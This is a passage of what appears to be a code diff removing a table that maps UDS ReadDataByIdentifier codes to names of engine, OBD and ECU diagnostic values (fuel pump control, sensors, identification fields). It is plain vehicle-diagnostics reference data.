-UDS_RDBI.dataIdentifiers[0xdb18] = "IOC Kraftstoffpumpe Control Drehzahlvorgabe ohne Schwellen" -UDS_RDBI.dataIdentifiers[0xdb22] = "IOC Kraftstoffpumpe Control Spannungsvorgabe ohne Schwellen" -UDS_RDBI.dataIdentifiers[0xdb26] = "IOC Kraftstoffdrucksensor Messoffset" -UDS_RDBI.dataIdentifiers[0xdb30] = "IOC Kraftstoffpumpe Control Phasenstrom Vorgabe ohne Schwellen" -UDS_RDBI.dataIdentifiers[0xdf00] = "EOL BLDC Driver Config" -UDS_RDBI.dataIdentifiers[0xdf06] = "EOL IOC Kraftstoffpumpe Control PWM Vorgabe ohne Schwellen" -UDS_RDBI.dataIdentifiers[0xdf18] = "EOL IOC Kraftstoffpumpe Control Drehzahlvorgabe ohne Schwellen" -UDS_RDBI.dataIdentifiers[0xe010] = "Engine In Use Histogram" -UDS_RDBI.dataIdentifiers[0xef00] = "EF01 EF20" # or Software Module Information Applikation Autosar, Software Module Information CANrmation Applikation Autosar ADC AR MAJOR VERSION, ECU Extract Version, SW Module Identification Application AUTOSAR AUTOSAR Module ID, SW Module Identification Application AUTOSAR -UDS_RDBI.dataIdentifiers[0xef02] = "02 DTC that caused required freeze frame data storage" # or Standard Reprogramming SW Package Information, Standard Software FBL Package Information -UDS_RDBI.dataIdentifiers[0xef03] = "SW Integration package ID Major Version" # or Standard Application SW Package Information, Standard Software Package Information, SW Integration package ID Major Version SIP ID Build Version -UDS_RDBI.dataIdentifiers[0xef04] = "SSA Version Information" # or 02 Calculated LOAD value -UDS_RDBI.dataIdentifiers[0xef05] = "02 Engine coolant temperature" -UDS_RDBI.dataIdentifiers[0xef06] = "Short Term Fuel Trim Bank" -UDS_RDBI.dataIdentifiers[0xef07] = "Long Term Fuel Trim Bank" -UDS_RDBI.dataIdentifiers[0xef0a] = "02 Fuel Pressure Gauge" -UDS_RDBI.dataIdentifiers[0xef0b] = "Intake Manifold Absolute Pressure OBD EF0B" -UDS_RDBI.dataIdentifiers[0xef0c] = "Stored engine speed" -UDS_RDBI.dataIdentifiers[0xef0d] = "02 Vehicle speed sensor" -UDS_RDBI.dataIdentifiers[0xef0e] = "02 Ignition timing advance for cylinder" -UDS_RDBI.dataIdentifiers[0xef0f] = "Stored intake air temperature" -UDS_RDBI.dataIdentifiers[0xef11] = "02 Absolute throttle position" -UDS_RDBI.dataIdentifiers[0xef1e] = "02 Auxiliary Input" -UDS_RDBI.dataIdentifiers[0xef1f] = "02 Time Since Engine Start" -UDS_RDBI.dataIdentifiers[0xef20] = "EF21 EF40" -UDS_RDBI.dataIdentifiers[0xef22] = "02 Fuel Pressure relative to manifold vacuum" -UDS_RDBI.dataIdentifiers[0xef23] = "02 Fuel rail pressure" -UDS_RDBI.dataIdentifiers[0xef2e] = "02 Commanded Evaporative Purge" -UDS_RDBI.dataIdentifiers[0xef2f] = "02 Fuel Level Input" -UDS_RDBI.dataIdentifiers[0xef31] = "02 Distance travelled since diagnostic trouble codes cleared" -UDS_RDBI.dataIdentifiers[0xef32] = "Stored raw tank differential pressure" -UDS_RDBI.dataIdentifiers[0xef33] = "02 Barometric Pressure" -UDS_RDBI.dataIdentifiers[0xef3c] = "02 Catalyst Temperature Bank 1 Sensor" -UDS_RDBI.dataIdentifiers[0xef40] = "EF41 EF60" -UDS_RDBI.dataIdentifiers[0xef42] = "02 Control module voltage" -UDS_RDBI.dataIdentifiers[0xef43] = "02 Absolute Load Value" -UDS_RDBI.dataIdentifiers[0xef44] = "02 Fuel Air Commanded Equivalence Ratio" -UDS_RDBI.dataIdentifiers[0xef45] = "02 Relative Throttle Position" -UDS_RDBI.dataIdentifiers[0xef46] = "02 Ambient air temperature same scaling as IAT 0F" -UDS_RDBI.dataIdentifiers[0xef47] = "02 Absolute Throttle Position B" -UDS_RDBI.dataIdentifiers[0xef48] = "02 Absolute Throttle Position C" -UDS_RDBI.dataIdentifiers[0xef49] = "02 Absolute Throttle Position D" -UDS_RDBI.dataIdentifiers[0xef4a] = "02 Absolute Throttle Position E" -UDS_RDBI.dataIdentifiers[0xef4c] = "02 Commanded Throttle Actuator Control" -UDS_RDBI.dataIdentifiers[0xef82] = "States of the monitoring ECU for CAN network diagnosis" -UDS_RDBI.dataIdentifiers[0xf010] = "Temperature Counter Erase" -UDS_RDBI.dataIdentifiers[0xf011] = "Appl SW Program Data Version" -UDS_RDBI.dataIdentifiers[0xf012] = "VehicleManufacturerECUSoftwareNumber Ref C" -UDS_RDBI.dataIdentifiers[0xf014] = "Network Configuration FlexRay Network" -UDS_RDBI.dataIdentifiers[0xf050] = "RB SW Version information" -UDS_RDBI.dataIdentifiers[0xf0e0] = "FD01 FEFF" -UDS_RDBI.dataIdentifiers[0xf0ff] = "RSA reset componant" -UDS_RDBI.dataIdentifiers[0xf100] = "ECU Identifikation: ECU Origin (DiagVersion)" # or Entriegeln, ActiveDiagnosticInformation Active Diagnostic Session, Active Diagnostic Status of ECU, Aktive Diagnose Information Aktive SG Software, F100 Active Diagnostic Session -UDS_RDBI.dataIdentifiers[0xf103] = "Vedoc Relevant Information Read Hardware Part Number" -UDS_RDBI.dataIdentifiers[0xf104] = "Read Ecu Name" -UDS_RDBI.dataIdentifiers[0xf10a] = "ECU Origin ECU Origin" -UDS_RDBI.dataIdentifiers[0xf10b] = "ECU Identification" -UDS_RDBI.dataIdentifiers[0xf10d] = "UDS Diagnostic Protocol Version MBN 10747" # or Version Diagnoseprotokoll DPRS Major Version, Version Diagnoseprotokoll Diagnostic Performance Requirements Standard, DDS Package Release -UDS_RDBI.dataIdentifiers[0xf10e] = "Prozessortyp Identifikation" # or FlexRay Configuration Information, Prozessortyp -UDS_RDBI.dataIdentifiers[0xf10f] = "OSEK Module Information Communication Layer Patch Level" # or OSEKModuleInformation Communication Layer Patch Level, OSEKModuleInformation, OSEK-Modulinformation, OSEK Modulinformation Betriebssystem Spezifikation -UDS_RDBI.dataIdentifiers[0xf111] = "ECU Identifikation: HW Partnumber" -UDS_RDBI.dataIdentifiers[0xf112] = "Chrysler Group Hardware" -UDS_RDBI.dataIdentifiers[0xf11d] = "HW SW Version Produktion BL SV SW Version Major" -UDS_RDBI.dataIdentifiers[0xf121] = "MercedesCarGroupSoftware" -UDS_RDBI.dataIdentifiers[0xf132] = "ECU Teilenummer" -UDS_RDBI.dataIdentifiers[0xf150] = "HardwareVersion HW" -UDS_RDBI.dataIdentifiers[0xf151] = "SoftwareVersion SW" -UDS_RDBI.dataIdentifiers[0xf152] = "Mechanik Version ME patch Level" -UDS_RDBI.dataIdentifiers[0xf153] = "Boot Software Version" -UDS_RDBI.dataIdentifiers[0xf154] = "HardwareSupplier Read" -UDS_RDBI.dataIdentifiers[0xf155] = "SoftwareSupplier Read" -UDS_RDBI.dataIdentifiers[0xf156] = "Layered Network Information Baud Rate" -UDS_RDBI.dataIdentifiers[0xf158] = "Vehicle Information Body Style" -UDS_RDBI.dataIdentifiers[0xf159] = "TCU Model Type HW Connection Capability" -UDS_RDBI.dataIdentifiers[0xf15a] = "Fingerprint History Code" -UDS_RDBI.dataIdentifiers[0xf15b] = "Read Fingerprint" -UDS_RDBI.dataIdentifiers[0xf160] = "Software Module Information Communication Matrix Last Channel LSB" -UDS_RDBI.dataIdentifiers[0xf161] = "Software Module Information PT CAN" -UDS_RDBI.dataIdentifiers[0xf162] = "Software Module Information PT Sensor CAN" -UDS_RDBI.dataIdentifiers[0xf163] = "Software Module Information Hybrid CAN" -UDS_RDBI.dataIdentifiers[0xf164] = "Software Module Information FlexRay" -UDS_RDBI.dataIdentifiers[0xf170] = "CAN Phys Layer Info Chassis CAN" -UDS_RDBI.dataIdentifiers[0xf171] = "CAN Phys Layer Info PT CAN" -UDS_RDBI.dataIdentifiers[0xf172] = "CAN Phys Layer Info PT Sensor CAN" -UDS_RDBI.dataIdentifiers[0xf173] = "CAN Phys Layer Info Hybrid CAN" -UDS_RDBI.dataIdentifiers[0xf174] = "CAN Phys Layer Info 4 Baud Rate 0 Last Channel BTR0 Channel 4" -UDS_RDBI.dataIdentifiers[0xf182] = "Calibration number" -UDS_RDBI.dataIdentifiers[0xf188] = "VehicleManufacturerECUSoftwareNumber Ref C" -UDS_RDBI.dataIdentifiers[0xf18c] = "ECU Serial Number" -UDS_RDBI.dataIdentifiers[0xf190] = "VIN Original" -UDS_RDBI.dataIdentifiers[0xf194] = "systemSupplierECUSoftwareNumber" -UDS_RDBI.dataIdentifiers[0xf195] = "systemSupplierECUSoftwareVersionNumber", -UDS_RDBI.dataIdentifiers[0xf196] = "ExhaustRegulationorTypeApprovalNumber" -UDS_RDBI.dataIdentifiers[0xf197] = "SystemNameorEngineType" # or System Supplier SBOOT Software Version Number -UDS_RDBI.dataIdentifiers[0xf198] = "System Supplier CBOOT Software Version Number" -UDS_RDBI.dataIdentifiers[0xf199] = "System Supplier CAL DATA Software Version Number" -UDS_RDBI.dataIdentifiers[0xf1a0] = "VIN Aktuell VIN" -UDS_RDBI.dataIdentifiers[0xf1a6] = "FlexRay Node Information" -UDS_RDBI.dataIdentifiers[0xf1b0] = "Nummernblock Lieferant" -UDS_RDBI.dataIdentifiers[0xf1c0] = "F1C1 F1E0" -UDS_RDBI.dataIdentifiers[0xf1f0] = "BPCM Controller Hardware DCX" -UDS_RDBI.dataIdentifiers[0xf1f1] = "BPCM Controller Hardware Version DCX" -UDS_RDBI.dataIdentifiers[0xf1f5] = "System Identification - Barcode" -UDS_RDBI.dataIdentifiers[0xf1ff] = "Mercedes Serial Number" -UDS_RDBI.dataIdentifiers[0xf252] = "Temprature Counter Erase" -UDS_RDBI.dataIdentifiers[0xf300] = "Dynamically Define Identifier by Identifier F300" -UDS_RDBI.dataIdentifiers[0xf301] = "HwAcc SST O Read IO Control" -UDS_RDBI.dataIdentifiers[0xf303] = "HwAcc SST I" -UDS_RDBI.dataIdentifiers[0xf310] = "HwAcc DIAG O Read IO Control" -UDS_RDBI.dataIdentifiers[0xf311] = "HwAcc SYS O Read IO Control" -UDS_RDBI.dataIdentifiers[0xf312] = "HwAcc DIAG I" -UDS_RDBI.dataIdentifiers[0xf313] = "HwAcc SYS I" -UDS_RDBI.dataIdentifiers[0xf318] = "HwAcc HSD O Read IO Control" -UDS_RDBI.dataIdentifiers[0xf31a] = "HwAcc HSD I" -UDS_RDBI.dataIdentifiers[0xf320] = "HwAcc SBC I" -UDS_RDBI.dataIdentifiers[0xf321] = "HwAcc SBC O Read IO Control" -UDS_RDBI.dataIdentifiers[0xf3b0] = "Read SW Varianten Information Erwartete Variante" -UDS_RDBI.dataIdentifiers[0xf3b1] = "Read Version LF ASIC SD408 SW Version High Nibble im Flash" -UDS_RDBI.dataIdentifiers[0xf400] = "F401 F420" # or Flash Verriegelung -UDS_RDBI.dataIdentifiers[0xf401] = "PID F401" -UDS_RDBI.dataIdentifiers[0xf403] = "system status" -UDS_RDBI.dataIdentifiers[0xf404] = "Calculated LOAD value" -UDS_RDBI.dataIdentifiers[0xf405] = "Engine coolant temperature" -UDS_RDBI.dataIdentifiers[0xf406] = "SHORT TERM FUEL TRIM" -UDS_RDBI.dataIdentifiers[0xf407] = "Long Term Fuel Trim" -UDS_RDBI.dataIdentifiers[0xf40a] = "Pressure Gauge" -UDS_RDBI.dataIdentifiers[0xf40b] = "Raw manifold pressure from sensor" -UDS_RDBI.dataIdentifiers[0xf40c] = "Engine RPM" -UDS_RDBI.dataIdentifiers[0xf40d] = "Vehicle speed sensor OBD F40D" -UDS_RDBI.dataIdentifiers[0xf40e] = "Ignition timing advance for cylinder 1 OBD F40E" -UDS_RDBI.dataIdentifiers[0xf40f] = "Raw manifold air temperature sensor" -UDS_RDBI.dataIdentifiers[0xf410] = "Air flow rate from mass air flow sensor OBD F410" -UDS_RDBI.dataIdentifiers[0xf411] = "Absolute throttle position" -UDS_RDBI.dataIdentifiers[0xf413] = "Location of oxygen sensors" -UDS_RDBI.dataIdentifiers[0xf414] = "Bank 1 Sensor" -UDS_RDBI.dataIdentifiers[0xf415] = "Oxygen downstream sensor output voltage" -UDS_RDBI.dataIdentifiers[0xf41c] = "OBD requirements to wich vehicle is designed OBD F41C" -UDS_RDBI.dataIdentifiers[0xf41e] = "Auxiliary Input" -UDS_RDBI.dataIdentifiers[0xf41f] = "Time Since Engine Start" -UDS_RDBI.dataIdentifiers[0xf420] = "F421 F440" -UDS_RDBI.dataIdentifiers[0xf421] = "Distance travelled while MIL is activated" -UDS_RDBI.dataIdentifiers[0xf422] = "Pressure relative to manifold vacuum" -UDS_RDBI.dataIdentifiers[0xf423] = "rail pressure" -UDS_RDBI.dataIdentifiers[0xf424] = "Oxygen sensor monitoring Sensor" -UDS_RDBI.dataIdentifiers[0xf425] = "Oxygen sensor monitoring Sensor" -UDS_RDBI.dataIdentifiers[0xf426] = "Oxygen sensor heater monitoring" -UDS_RDBI.dataIdentifiers[0xf42c] = "Commanded EGR" -UDS_RDBI.dataIdentifiers[0xf42d] = "EGR Error" -UDS_RDBI.dataIdentifiers[0xf42e] = "Commanded Evaporative Purge" -UDS_RDBI.dataIdentifiers[0xf42f] = "Level Input" -UDS_RDBI.dataIdentifiers[0xf430] = "Number of warm ups since diagnostic trouble codes cleared OBD F430" -UDS_RDBI.dataIdentifiers[0xf431] = "Distance travelled since diagnostic trouble codes cleared" -UDS_RDBI.dataIdentifiers[0xf432] = "Raw Tank differential pressure" -UDS_RDBI.dataIdentifiers[0xf433] = "Barometric Pressure" -UDS_RDBI.dataIdentifiers[0xf43c] = "Catalyst Temperature Bank 1 Sensor" -UDS_RDBI.dataIdentifiers[0xf43d] = "Catalyst Temperature Bank 2 Sensor" -UDS_RDBI.dataIdentifiers[0xf43e] = "Catalyst Temperature Bank 1 Sensor" -UDS_RDBI.dataIdentifiers[0xf43f] = "Catalyst Temperature Bank 2 Sensor" -UDS_RDBI.dataIdentifiers[0xf440] = "F441 F460" -UDS_RDBI.dataIdentifiers[0xf441] = "PID F441" -UDS_RDBI.dataIdentifiers[0xf442] = "Control module voltage" -UDS_RDBI.dataIdentifiers[0xf443] = "Absolute Load Value" -UDS_RDBI.dataIdentifiers[0xf444] = "Air Commanded Equivalence Ratio" -UDS_RDBI.dataIdentifiers[0xf445] = "Relative Throttle Position" -UDS_RDBI.dataIdentifiers[0xf446] = "Ambient air temperature" -UDS_RDBI.dataIdentifiers[0xf447] = "Absolute Throttle Position B" -UDS_RDBI.dataIdentifiers[0xf448] = "Absolute Throttle Position C" -UDS_RDBI.dataIdentifiers[0xf449] = "Accelerator Pedal Position D" -UDS_RDBI.dataIdentifiers[0xf44a] = "Accelerator Pedal Position E" -UDS_RDBI.dataIdentifiers[0xf44b] = "Accelerator Pedal Position F" -UDS_RDBI.dataIdentifiers[0xf44c] = "Commanded Throttle Actuator Control" -UDS_RDBI.dataIdentifiers[0xf44e] = "Engine run time since DTCs cleared" -UDS_RDBI.dataIdentifiers[0xf44f] = "Maximum value for Intake Manifold Absolute Pressure" -UDS_RDBI.dataIdentifiers[0xf453] = "Absolute Evap System Vapor Pressure" -UDS_RDBI.dataIdentifiers[0xf454] = "Evap System Vapor Pressure" -UDS_RDBI.dataIdentifiers[0xf45c] = "Engine Oil Temperature" -UDS_RDBI.dataIdentifiers[0xf45d] = "Injection Timing" -UDS_RDBI.dataIdentifiers[0xf45e] = "Engine Fuel Rate" -UDS_RDBI.dataIdentifiers[0xf460] = "F461 F480" -UDS_RDBI.dataIdentifiers[0xf461] = "Driver s Demand Engine Percent Torque" -UDS_RDBI.dataIdentifiers[0xf462] = "Actual Engine Percent Torque" -UDS_RDBI.dataIdentifiers[0xf463] = "Engine Reference Torque" -UDS_RDBI.dataIdentifiers[0xf464] = "Engine Percent Torque At Point" -UDS_RDBI.dataIdentifiers[0xf469] = "Commanded EGR and EGR Error" -UDS_RDBI.dataIdentifiers[0xf46a] = "Commanded Diesel Intake Air Flow Control and Relative Intake Air Flow Position" -UDS_RDBI.dataIdentifiers[0xf46b] = "Exhaust Gas Recirculation Temperature" -UDS_RDBI.dataIdentifiers[0xf46d] = "Pressure Control System" -UDS_RDBI.dataIdentifiers[0xf470] = "Boost Pressure Control" -UDS_RDBI.dataIdentifiers[0xf473] = "Exhaust Pressure" -UDS_RDBI.dataIdentifiers[0xf475] = "Turbocharger A Temperature" -UDS_RDBI.dataIdentifiers[0xf477] = "Charge Air Cooler Temperature CACT" -UDS_RDBI.dataIdentifiers[0xf47a] = "Diesel Particulate Filter DPF Bank" -UDS_RDBI.dataIdentifiers[0xf47c] = "Diesel Particulate Filter DPF Temperature" -UDS_RDBI.dataIdentifiers[0xf480] = "F481 F4A0" -UDS_RDBI.dataIdentifiers[0xf488] = "SCR Inducement System" -UDS_RDBI.dataIdentifiers[0xf48b] = "Diesel Aftertreatment" -UDS_RDBI.dataIdentifiers[0xf48c] = "Sensor Wide Range" -UDS_RDBI.dataIdentifiers[0xf490] = "WWH OBD Vehicle OBD System information" -UDS_RDBI.dataIdentifiers[0xf491] = "WWH OBD ECU OBD System Information" -UDS_RDBI.dataIdentifiers[0xf493] = "WWH OBD Vehicle counters supported" -UDS_RDBI.dataIdentifiers[0xf494] = "NOx control driver inducement system status" -UDS_RDBI.dataIdentifiers[0xf600] = "F600 F620" -UDS_RDBI.dataIdentifiers[0xf601] = "OBDMID Oxygen sensor diagnostic for service 06 OBD F601" -UDS_RDBI.dataIdentifiers[0xf602] = "06 Upstream Oxygen sensor diagnostic" -UDS_RDBI.dataIdentifiers[0xf620] = "F621 F640" -UDS_RDBI.dataIdentifiers[0xf621] = "06 Catalyst diagnostic" -UDS_RDBI.dataIdentifiers[0xf631] = "DC motor valve" -UDS_RDBI.dataIdentifiers[0xf635] = "06 VVT Diagnostic" -UDS_RDBI.dataIdentifiers[0xf639] = "OBDMID Evaporation monitoring fuel cap misssing" -UDS_RDBI.dataIdentifiers[0xf63a] = "OBDMID Evaporation monitoring large leak diagnostic" -UDS_RDBI.dataIdentifiers[0xf63b] = "OBDMID Evaporation monitoring 1mm leak diagnostic" -UDS_RDBI.dataIdentifiers[0xf640] = "F641 F660" -UDS_RDBI.dataIdentifiers[0xf641] = "Downstream oxygen sensor heater monitoring" -UDS_RDBI.dataIdentifiers[0xf642] = "Upstream oxygen sensor heater monitoring" -UDS_RDBI.dataIdentifiers[0xf660] = "F661 F680" -UDS_RDBI.dataIdentifiers[0xf680] = "F681 F6A0" -UDS_RDBI.dataIdentifiers[0xf681] = "system diagnostic" -UDS_RDBI.dataIdentifiers[0xf685] = "Turbocharger Monitor diagnostic" -UDS_RDBI.dataIdentifiers[0xf6a0] = "F6A1 F6C0" -UDS_RDBI.dataIdentifiers[0xf6a1] = "OBDMID Misfire diagnostic" -UDS_RDBI.dataIdentifiers[0xf6b2] = "Diesel Particulate Filter Diagnostic" -UDS_RDBI.dataIdentifiers[0xf6c0] = "F6C1 F6E0" -UDS_RDBI.dataIdentifiers[0xf6e0] = "F6E1 F6FF" -UDS_RDBI.dataIdentifiers[0xf6e3] = "EGR Low Pressure System Diagnostic" -UDS_RDBI.dataIdentifiers[0xf6e4] = "Turbocharger Monitor Bank1" -UDS_RDBI.dataIdentifiers[0xf6e5] = "Engine Cooling Temperature Monitoring" -UDS_RDBI.dataIdentifiers[0xf6e8] = "06 Evaporation diagnosis" -UDS_RDBI.dataIdentifiers[0xf800] = "F801 F820" -UDS_RDBI.dataIdentifiers[0xf802] = "OBDMID Vehicle identification number" -UDS_RDBI.dataIdentifiers[0xf804] = "OBD CALIDs" -UDS_RDBI.dataIdentifiers[0xf805] = "ZBS Number" -UDS_RDBI.dataIdentifiers[0xf806] = "Calibration verification numbers" -UDS_RDBI.dataIdentifiers[0xf808] = "In Use Monitor Performance Ratio" # or HEX Gasoline, IUPR gasoline -UDS_RDBI.dataIdentifiers[0xf80a] = "09 systemNameorEngineType" -UDS_RDBI.dataIdentifiers[0xf80b] = "IUPR diesel" # or HEX Diesel -UDS_RDBI.dataIdentifiers[0xf80f] = "09 exhaustRegulationorTypeApprovalNumber" -UDS_RDBI.dataIdentifiers[0xf810] = "09 PROTOCOL IDENTIFICATION" -UDS_RDBI.dataIdentifiers[0xf811] = "09 WWH OBD GTR NUMBER" -UDS_RDBI.dataIdentifiers[0xf813] = "Certification Test Group Engine Family Number CTGEFN" -UDS_RDBI.dataIdentifiers[0xfb04] = "CAL-ID" -UDS_RDBI.dataIdentifiers[0xfd00] = "Implicit Variant Coding Read Car Type STRUCTURE Car with Ethanolsensor" -UDS_RDBI.dataIdentifiers[0xfd01] = "UH Minimum Module Voltage" # or Engine speed 1 Read Engine speed -UDS_RDBI.dataIdentifiers[0xfd02] = "PM" # or UH Lifetime Minimum OCV -UDS_RDBI.dataIdentifiers[0xfd03] = "UH Coolant Inlet Temperature" # or SBW Infos -UDS_RDBI.dataIdentifiers[0xfd04] = "Temperaturspeicher Leiterplatte loeschen" # or Temperatur Leiterplatte, Total-Kodierung, injection cut off -UDS_RDBI.dataIdentifiers[0xfd05] = "UH Module Coolant Delta" # or Terminal 15 status after debouncing -UDS_RDBI.dataIdentifiers[0xfd06] = "Widerstandswerte Hebelgeber Hebelgeber Links" # or UH Total Time Contactors Closed, Widerstandswerte Hebelgeber, system ECU sub state -UDS_RDBI.dataIdentifiers[0xfd07] = "State of synchronisation" # or RBM Festsitzerkennung Hebelgeber Denominator, UH Total Time of Operation, Festsitzerkennung Hebelgeber -UDS_RDBI.dataIdentifiers[0xfd08] = "Diagnosis power stage entry conditions fulfilled" # or UH Isolation Fault Diagnostic -UDS_RDBI.dataIdentifiers[0xfd09] = "cut off" -UDS_RDBI.dataIdentifiers[0xfd0a] = "Condition end of start" -UDS_RDBI.dataIdentifiers[0xfd0b] = "Opening angle set point TDC angle reference" -UDS_RDBI.dataIdentifiers[0xfd0c] = "Injection abortion counter" -UDS_RDBI.dataIdentifiers[0xfd0d] = "Dwell time" -UDS_RDBI.dataIdentifiers[0xfd0e] = "Applied ignition angle" -UDS_RDBI.dataIdentifiers[0xfd0f] = "Condition for active ignition circuit diagnosis" -UDS_RDBI.dataIdentifiers[0xfd10] = "Ignition powerstage error flag byte" -UDS_RDBI.dataIdentifiers[0xfd11] = "Flagbyte SPI error" -UDS_RDBI.dataIdentifiers[0xfd12] = "Flagword for stimulated ignition misfires" -UDS_RDBI.dataIdentifiers[0xfd13] = "Engine state" -UDS_RDBI.dataIdentifiers[0xfd14] = "State of crankshaft signal evaluation" -UDS_RDBI.dataIdentifiers[0xfd15] = "Starter status" -UDS_RDBI.dataIdentifiers[0xfd16] = "state of error wrong crankshaft signal" -UDS_RDBI.dataIdentifiers[0xfd17] = "Reason of cranksahft error" -UDS_RDBI.dataIdentifiers[0xfd18] = "State of camshaft position" -UDS_RDBI.dataIdentifiers[0xfd19] = "State of the camshaft diagnosis" -UDS_RDBI.dataIdentifiers[0xfd1a] = "voltage" -UDS_RDBI.dataIdentifiers[0xfd1b] = "Dew point" -UDS_RDBI.dataIdentifiers[0xfd1c] = "Bit heating on HEGO sensor 1 bank" -UDS_RDBI.dataIdentifiers[0xfd1d] = "Internal resistance HEGO sensor 1 bank" -UDS_RDBI.dataIdentifiers[0xfd1e] = "Signal acquisition of HEGO sensor 1 bank 1 Bit measurement of internal resistance enabled" -UDS_RDBI.dataIdentifiers[0xfd1f] = "Bit heating on HEGO sensor 2 bank" -UDS_RDBI.dataIdentifiers[0xfd20] = "FD21 FD40" # or Cobasys UH Security Access -UDS_RDBI.dataIdentifiers[0xfd21] = "Internal resistance HEGO sensor 2 bank" # or Cobasys Reset Usage History -UDS_RDBI.dataIdentifiers[0xfd22] = "Signal acquisition of HEGO sensor 2 bank 1 Bit measurement of internal resistance enabled" -UDS_RDBI.dataIdentifiers[0xfd23] = "Cycle flag for diagnosis LSU sensor 1 bank" -UDS_RDBI.dataIdentifiers[0xfd24] = "Ceramics temperature sensor 1 bank" -UDS_RDBI.dataIdentifiers[0xfd25] = "LSU temperature valid sensor 1 bank" -UDS_RDBI.dataIdentifiers[0xfd26] = "CJ135 Electrical diagnosis allowed" -UDS_RDBI.dataIdentifiers[0xfd27] = "Lambda actual value" -UDS_RDBI.dataIdentifiers[0xfd28] = "LSU Signal quality" -UDS_RDBI.dataIdentifiers[0xfd29] = "LSU Pump current" -UDS_RDBI.dataIdentifiers[0xfd2a] = "Signal quality for internal LSU temperature" -UDS_RDBI.dataIdentifiers[0xfd2b] = "Knock sensor diagnosis active lower threshold" -UDS_RDBI.dataIdentifiers[0xfd2c] = "KS diagnosis current value lower threshold UDKSV6UN" -UDS_RDBI.dataIdentifiers[0xfd2d] = "Reference level knock control" -UDS_RDBI.dataIdentifiers[0xfd2e] = "Knock amplification factor" -UDS_RDBI.dataIdentifiers[0xfd2f] = "Air charge load" -UDS_RDBI.dataIdentifiers[0xfd30] = "PSP request" # or Cobasys UH Amp Hrs In -UDS_RDBI.dataIdentifiers[0xfd31] = "PSP powerstage command" # or Cobasys UH Amp Hrs Out -UDS_RDBI.dataIdentifiers[0xfd32] = "Cobasys UH Last Abuse Cond" # or Manifold pressure sensor voltage -UDS_RDBI.dataIdentifiers[0xfd33] = "Cobasys Activate Service CAN" # or Boost pressure sensor voltage -UDS_RDBI.dataIdentifiers[0xfd34] = "Manifold air temperature sensor voltage" -UDS_RDBI.dataIdentifiers[0xfd35] = "Temperature Upstream Throttle voltage" -UDS_RDBI.dataIdentifiers[0xfd36] = "Throttle valve sensor feedback 1 voltage" -UDS_RDBI.dataIdentifiers[0xfd37] = "Throttle valve sensor feedback 2 voltage" -UDS_RDBI.dataIdentifiers[0xfd38] = "H Bridge throttle command" -UDS_RDBI.dataIdentifiers[0xfd39] = "H Bridge throttle inhibition" -UDS_RDBI.dataIdentifiers[0xfd3a] = "Pop off command" -UDS_RDBI.dataIdentifiers[0xfd3b] = "VVT Intake powerstage command" -UDS_RDBI.dataIdentifiers[0xfd3c] = "Waste gate powerstage command" -UDS_RDBI.dataIdentifiers[0xfd3d] = "Engine temperature voltage" -UDS_RDBI.dataIdentifiers[0xfd3e] = "Engine temperature" -UDS_RDBI.dataIdentifiers[0xfd3f] = "FanDIO 0 powerstage command" -UDS_RDBI.dataIdentifiers[0xfd40] = "FD41 FD60" -UDS_RDBI.dataIdentifiers[0xfd41] = "FanDIO 1 powerstage command" -UDS_RDBI.dataIdentifiers[0xfd42] = "CThmst2 powerstage command" -UDS_RDBI.dataIdentifiers[0xfd43] = "FAN powerstage command" -UDS_RDBI.dataIdentifiers[0xfd44] = "CThmst powerstage command" -UDS_RDBI.dataIdentifiers[0xfd45] = "OilPCtl powerstage command" -UDS_RDBI.dataIdentifiers[0xfd46] = "DPTC powerstage command" -UDS_RDBI.dataIdentifiers[0xfd47] = "ACCOM powerstage command" -UDS_RDBI.dataIdentifiers[0xfd48] = "CPURGEV powerstage command" -UDS_RDBI.dataIdentifiers[0xfd49] = "Shtr powerstage command" -UDS_RDBI.dataIdentifiers[0xfd4a] = "Raw load on the Alternator" -UDS_RDBI.dataIdentifiers[0xfd4b] = "Accelerator pedal brute value sensor 1 without limitations" -UDS_RDBI.dataIdentifiers[0xfd4d] = "Gas pedal value sensor" -UDS_RDBI.dataIdentifiers[0xfd4e] = "WG position voltage" -UDS_RDBI.dataIdentifiers[0xfd4f] = "Brake switch raw value" -UDS_RDBI.dataIdentifiers[0xfd50] = "AC switch raw value" -UDS_RDBI.dataIdentifiers[0xfd51] = "Cruise control and speed limiter steering wheel push buttons raw value" -UDS_RDBI.dataIdentifiers[0xfd52] = "Input of the cruise control main switch raw value" -UDS_RDBI.dataIdentifiers[0xfd53] = "Speed limiter main switch raw value" -UDS_RDBI.dataIdentifiers[0xfd54] = "Clutch raw value" -UDS_RDBI.dataIdentifiers[0xfd55] = "State of the begin high of the clutch pedal raw value" -UDS_RDBI.dataIdentifiers[0xfd56] = "CAC powerstage command" -UDS_RDBI.dataIdentifiers[0xfd57] = "H Bridge Waste Gate direction information" -UDS_RDBI.dataIdentifiers[0xfd58] = "H Bridge Waste Gate command" -UDS_RDBI.dataIdentifiers[0xfd59] = "Reset ID of the last reset reason" -UDS_RDBI.dataIdentifiers[0xfd5a] = "Dynamically switched environmental condition messages depending on error reaction" -UDS_RDBI.dataIdentifiers[0xfd5b] = "Dynamically switched environmental condition messages depending on error reaction" -UDS_RDBI.dataIdentifiers[0xfd5c] = "Dynamically switched environmental condition messages depending on error reaction" -UDS_RDBI.dataIdentifiers[0xfd5d] = "Dynamically switched environmental condition messages depending on error reaction 4" -UDS_RDBI.dataIdentifiers[0xfd5e] = "Output voltage of HEGO sensor 1 bank 1 extended range" -UDS_RDBI.dataIdentifiers[0xfd5f] = "Output voltage of HEGO sensor 2 bank 1 extended range" -UDS_RDBI.dataIdentifiers[0xfd60] = "FD61 FD80" -UDS_RDBI.dataIdentifiers[0xfd61] = "Bit internal resistance is valid HEGO sensor 1 bank" -UDS_RDBI.dataIdentifiers[0xfd62] = "Bit internal resistance is valid HEGO sensor 2 bank" -UDS_RDBI.dataIdentifiers[0xfd64] = "Vacuum pump command" -UDS_RDBI.dataIdentifiers[0xfd65] = "Vacumm pressure sensor value" -UDS_RDBI.dataIdentifiers[0xfd66] = "Condition for knocking Knocking event detected" -UDS_RDBI.dataIdentifiers[0xfd67] = "Condition for knock control active" -UDS_RDBI.dataIdentifiers[0xfd68] = "integrator value with offset correction Instantaneous knock noise for each cylinder 0" -UDS_RDBI.dataIdentifiers[0xfd69] = "integrator value with offset correction Instantaneous knock noise for each cylinder" -UDS_RDBI.dataIdentifiers[0xfd6a] = "integrator value with offset correction Instantaneous knock noise for each cylinder" -UDS_RDBI.dataIdentifiers[0xfd6b] = "measured Ip raw value sensor 1 bank" -UDS_RDBI.dataIdentifiers[0xfd6c] = 